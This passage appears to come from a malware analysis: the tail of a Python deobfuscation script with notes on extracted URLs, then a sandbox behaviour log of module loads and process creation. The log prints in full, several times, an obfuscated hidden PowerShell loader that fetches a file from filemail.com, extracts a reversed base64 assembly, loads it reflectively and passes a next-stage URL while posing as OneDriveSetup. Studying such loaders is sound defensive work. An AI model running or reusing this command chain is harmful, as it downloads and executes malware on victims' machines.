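    script = deobfuscate(STAGE2)
    print("invoker :", resolve_invoker(STAGE2))
    print("script  :", script)
    print("download:", re.findall(r"https?://[^\s']+", script))
    print("args    :", invoke_args(script))
    print("carved  :", carve_payload(FAKE_DOWNLOAD)[:4])
```

Two details worth noting when reading the output. The reversed first argument decodes to http://sbv.pushswroller.eu/gfy/gesr.txt, obtained purely by reversing the literal in the command line, so it is a candidate next-stage URL to block alongside the filemail.com link. And the loader's "check" (`$startIndex -ge 0 -and $endIndex -gt $startIndex;`) is an expression whose result is discarded, not a conditional, so a download without the markers would simply make Substring throw; carve_payload returns None in that case instead.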
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttpcom.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: schannel.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: rsaenh.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: rasapi32.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: rasman.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: rtutils.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: mswsock.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: winhttp.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: dnsapi.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: winnsi.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: rasadhlp.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: fwpuclnt.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: schannel.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: mskeyprotect.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: ntasn1.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: ncrypt.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: ncryptsslp.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Section loaded: dpapi.dll
                  Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Binary string: _.pdb source: OneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp

                  Data Obfuscation

                  Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Shell") shelll.Run chambrana, 0, False WScript.Quit(ERR_GENERAL_FAILURE)NPakelvWqGxKgNU = "iLrqLLZhKJZhWKK"aZQJzULepzicsLf = "bCIcGhfCiqZLfzx"CKKnLqffZnoWKpL = "AJpNpLgGoueLIfL"ienboAmdnWgRNuZ = "acWbdcUceOkhChk"iBljcSeLoKWAqPf = "erhRqRLKWcnkCdh"heAoBiPLPLPGiLi = "IqWkGLmkiWUioUj"CGzWpkuJqOPpLOK = "hALArLABbULqdcW"KdLzxObTBaskeLG = "UWULNheAkWaWtJi"GZqzfSiShmWZpWq = "tGkkWGiLKWTozNL"rLLLNGgGGefcLoK = "kxAcmTBOHdKORah"OikPALkKmLekohc = "mgcmUWHpzbZpWbl"pRRWAQzLcxxozGb = "LAoCjKLhZxUZzLL"tkWczjLLWRWBLKL = "CgUxkKziLeZNcth"eodfeZWCWWWWdqd = "ZBIWbOclqWLecLU"CGdBhqoGsIWnotL = "ABlirUhiLSkciWR"ddUhIKobTdsoiGK = "KWLubjnHeAJpZLp"GcPWWWtuRBCmKle = "aPbLcpbSutUiLfe"LKUpGWWiLGiiiil = "zBfuAkokZsipaZW"APKWWLzlUcicKNi = "ibHhmGaQLLLWLLb"WcPmLNRznLeOkNA = "giIAWWtKLGLhWzi"zxbdePLaczfkiTL = "pKLiWcfbWmGZWAr"KRLnZpcLxbOWWnC = "NAKpuKKiLzRPKqZ"WNiBHUgtLqcpzfz = "iozZnZPAmmGNaiZ"QuhKSkGWJhLoWzW = "aKildibLfLZipuk"vzhxsiGClboLQuZ = "iGOKCmWWnttztAd"LcfLaPazlWLOSfm = "LWUUGIiLafKstWI"GWSUbLaPGpLHLbf = "QALAQKPcAlLbZpg"AcLbaUbuaAzWGKi = "qQqKWLPpGfrpefa"AHWWeuZljCLUiOo = "UIIPGcaLjzKappt"kuzezLUmZeLceJA = "NiidWolUfiskzKL"xUtUJaiGbhKJNck = "tWULcvZvSRLaiNc"lmAIKGczpLWdPba = "cPvWAKiHGAgznLa"LZGzLadcpizABOL = "nkNrxcCWnzRLkjb"OLkdrkzdLfakUSU = "WIkHKGNzdUkoKOz"WZcBAWkqWpcjpfi = "eUAmNKorBPLNpUK"hWqTbGWoPLKAKog = "KkiTppNGAuRNWcL"UdbxLKWeBOWnaiU = "GiWLCeGWjGipLkA"qUAJzdLApLpaaKW = "OeQqzipiIuWClLL"mcmLJKeopmsjfGd = "gLiGeaLLHCuhzoP"AmaKkoGLAiONiLP = "UeiPLhAijLoCxnN"cPcoLtZObPLLWNo = "zhpShvKUciiRLUN"WfASIhigsozmpOk = "AKttrLLcGcKhAuK"kLcUAkmiWCeBGLP = "xGmqLOChLGcdCZW"GUmacGWuxcWGcPe = "zWpOBknPtakzbJd"mPKWLWbiiutGPZL = "UkWURvWZcuOpIke"dAzGUAoBBfhkcWG = "GdbomNeGGpivgbv"RaceIOAavcPetmL = "NlikJWllcLHuAGi"lazNNatKWAhpCfG = "LaCGJWoGLpSPUqb"UWmKLGkkoxGqWUq = "fjLdRGcLpqpjGco"qcBemtGpcLbiaKe = "KKlAfZHAmLRegIp"ioUQAUAcRKdLxiN = "ZUdKxWtBaHLzGWi"GLLLeGmLrKTkeLW = "xRAqUQWkGLcHgWN"kzZnWkRLcCgKILK = "BLChpLmZiLicpLZ"igIAiLKBqKBGLjg = "WOThSLCiixdxoUU"UHqHJZIbBqICJLB = "pvLfWpCphociiLi"GCumGPtWjnpRqGP = "KSoWmkLsNbZLGkG"hUhBzejBmcPPRtU = "qazQgGPNicWgCUW"fUKBvvpKaKsfLzf = "rLoWzeGjrhhxcAL"LTWbNmKIcipWCWz = "jmLudLWWGGWiCpp"ztlPhpLKmGALKlf = "qzWxSpxPIoiBpGp"lmcqmdKPmGKAieW = "kZKAixKcouZUUBG"bJKLjQkALNsUkKL = "ILUdWxLenzKfsCP"eWdfiRGkBjGLmWG = "pUNidKAIACSLeim"lLafCuWRsiKLjct = "lZIulLpLLWzGUkH"CikcLjkWGWaGqWZ = "mLCKcPqNLiLKbNz"PnTLHCoZgAZBuvp = "PvkpPOoLUsCbaLL"CciJJnLPKLOUKWp = "izxKNWiiKqpWGbg"azZLWIKWfeiWzGN = "nqNLRPQemBOOoit"LRzLcRfLiANUnAf = "scqWnidLUighmfZ"xPqzccZHWKWtiWb = "LikUZLQtppPGNkZ"eWphLChbCWacGCl = "RGkOsWBOiUmfohW"GZioiPhObBiLfff = "AiOKLQaoLZcRcmt"LaLtHcGrhBxrfbB = "nUiNGQmLkUehWzK"zLPCalUWclztqWp = "KWzZNtkkfUhILmg"hdKSzomRSAWAKeb = "WoKiUqfiOiWpiWb"odOKLWbdmLWPLpt = "PUKLniLoKULmLZK"UkWucZvzLHLhBtx = "IbSgJKGUUTLeCPO"jqitNesOZKapNiW = "zjeUWCZieUexKrS"qPiecbkZiLcRAcU = "WTWqdCfKGfLONeq"cnuNkGdzfghNGbx = "GkLHgCfWLbeuagK"OibKKJfmnckqvNz = "LoqPGpeKiLpWGhK"oKQRxUZohWNSKkp = "AWeCLWoGujCtnWL"LAWANGAdiJKoiLd = "PuAKZLdLLqbBotf"hZKTeZUeL
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([strIng]$vErBoSePrefEreNCE)[1,3]+'X'-Join'')( (('EIHimageUrl'+' = zNqhttps://3105.filemail.com/'+'api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c zNq;EIHwebClient = New-Object System.Net.WebClient;EIHimageBytes = EIHwebClient.DownloadData(EIHimageUrl);EIHimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(EIHi'+'mageBytes);EIHstartFlag = zNq<<BASE64_START'+'>>zNq;EIH'+'endFlag = zNq<<BASE64_END>>zNq;EIHst'+'art'+'Index = EIHimageText.IndexOf'+'(EIHstartFlag);EIHen'+'dIndex = EIHimageText.Inde'+'xO'+'f(EIHen'+'dFlag);EIHstartIndex -ge 0 -and EIHendIndex -gt EIHstartIndex;EIHstartIndex += EIHstartFlag.Length;EIHbase64Length = EIHendIndex - EIHstartIndex;EIHbase64Com'+'mand = EIHimageText.Substring('+'EIHstartIndex, EIHbase'+'64Length);EIHbase64Reversed = '+'-join (EIHbase64Command.ToCharArray() OTF ForEach-Object { EIH_ })[-1..-'+'(EIHbase64Command.Length)];E'+'IHcommandBytes = [System.Convert]::FromBase64String(EIH'+'base'+'64Reversed);EIHloadedAssembly = [S'+'ystem.Reflection.Assembly]::Load(EIHcommand'+'Bytes);EIHvaiMethod = [dnlib.IO.Home].GetMethod(zNqVAIzNq);EIHvaiMethod.Invoke(EIHnull, @(zNqtxt.rseg/yf'+'g'+'/ue.rellorw'+'shsup.v'+'bs//:p'+'tth'+'zNq, zNqdesat'+'ivadozNq, zNqdesa'+'tivadoz'+'Nq, zN'+'qdesativadozNq,'+' zNqdesativadozNq, zNq1'+'zNq, zNqOneDriveSetupzNq, zNqdesativadozNq, zNqdesativadozNq,zNqdesativadozNq,zNqd'+'esativadozNq,zNqdesativa'+'dozNq,zNq1zNq,zNqdes'+'at'+'ivadozNq));') -CREPlace'zNq',[ChAR]39 -replAce ([ChAR]69+[ChAR]73+[ChAR]72),[ChAR]36-replAce ([ChAR]79+[ChAR]84+[ChAR]70),[ChAR]124))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([strIng]$vErBoSePrefEreNCE)[1,3]+'X'-Join'')( (('EIHimageUrl'+' = zNqhttps://3105.filemail.com/'+'api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c zNq;EIHwebClient = New-Object System.Net.WebClient;EIHimageBytes = EIHwebClient.DownloadData(EIHimageUrl);EIHimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(EIHi'+'mageBytes);EIHstartFlag = zNq<<BASE64_START'+'>>zNq;EIH'+'endFlag = zNq<<BASE64_END>>zNq;EIHst'+'art'+'Index = EIHimageText.IndexOf'+'(EIHstartFlag);EIHen'+'dIndex = EIHimageText.Inde'+'xO'+'f(EIHen'+'dFlag);EIHstartIndex -ge 0 -and EIHendIndex -gt EIHstartIndex;EIHstartIndex += EIHstartFlag.Length;EIHbase64Length = EIHendIndex - EIHstartIndex;EIHbase64Com'+'mand = EIHimageText.Substring('+'EIHstartIndex, EIHbase'+'64Length);EIHbase64Reversed = '+'-join (EIHbase64Command.ToCharArray() OTF ForEach-Object { EIH_ })[-1..-'+'(EIHbase64Command.Length)];E'+'IHcommandBytes = [System.Convert]::FromBase64String(EIH'+'base'+'64Reversed);EIHloadedAssembly = [S'+'ystem.Reflection.Assembly]::Load(EIHcommand'+'Bytes);EIHvaiMethod = [dnlib.IO.Home].GetMethod(zNqVAIzNq);EIHvaiMethod.Invoke(EIHnull, @(zNqtxt.rseg/yf'+'g'+'/ue.rellorw'+'shsup.v'+'bs//:p'+'tth'+'zNq, zNqdesat'+'ivadozNq, zNqdesa'+'tivadoz'+'Nq, zN'+'qdesativadozNq,'+' zNqdesativadozNq, zNq1'+'zNq, zNqOneDriveSetupzNq, zNqdesativadozNq, zNqdesativadozNq,zNqdesativadozNq,zNqd'+'esativadozNq,zNqdesativa'+'dozNq,zNq1zNq,zNqdes'+'at'+'ivadozNq));') -CREPlace'zNq',[ChAR]39 -replAce ([ChAR]69+[ChAR]73+[ChAR]72),[ChAR]36-replAce ([ChAR]79+[ChAR]84+[ChAR]70),[ChAR]124))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([strIng]$vErBoSePrefEreNCE)[1,3]+'X'-Join'')( (('EIHimageUrl'+' = zNqhttps://3105.filemail.com/'+'api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c zNq;EIHwebClient = New-Object System.Net.WebClient;EIHimageBytes = EIHwebClient.DownloadData(EIHimageUrl);EIHimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(EIHi'+'mageBytes);EIHstartFlag = zNq<<BASE64_START'+'>>zNq;EIH'+'endFlag = zNq<<BASE64_END>>zNq;EIHst'+'art'+'Index = EIHimageText.IndexOf'+'(EIHstartFlag);EIHen'+'dIndex = EIHimageText.Inde'+'xO'+'f(EIHen'+'dFlag);EIHstartIndex -ge 0 -and EIHendIndex -gt EIHstartIndex;EIHstartIndex += EIHstartFlag.Length;EIHbase64Length = EIHendIndex - EIHstartIndex;EIHbase64Com'+'mand = EIHimageText.Substring('+'EIHstartIndex, EIHbase'+'64Length);EIHbase64Reversed = '+'-join (EIHbase64Command.ToCharArray() OTF ForEach-Object { EIH_ })[-1..-'+'(EIHbase64Command.Length)];E'+'IHcommandBytes = [System.Convert]::FromBase64String(EIH'+'base'+'64Reversed);EIHloadedAssembly = [S'+'ystem.Reflection.Assembly]::Load(EIHcommand'+'Bytes);EIHvaiMethod = [dnlib.IO.Home].GetMethod(zNqVAIzNq);EIHvaiMethod.Invoke(EIHnull, @(zNqtxt.rseg/yf'+'g'+'/ue.rellorw'+'shsup.v'+'bs//:p'+'tth'+'zNq, zNqdesat'+'ivadozNq, zNqdesa'+'tivadoz'+'Nq, zN'+'qdesativadozNq,'+' zNqdesativadozNq, zNq1'+'zNq, zNqOneDriveSetupzNq, zNqdesativadozNq, zNqdesativadozNq,zNqdesativadozNq,zNqd'+'esativadozNq,zNqdesativa'+'dozNq,zNq1zNq,zNqdes'+'at'+'ivadozNq));') -CREPlace'zNq',[ChAR]39 -replAce ([ChAR]69+[ChAR]73+[ChAR]72),[ChAR]36-replAce ([ChAR]79+[ChAR]84+[ChAR]70),[ChAR]124))"
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
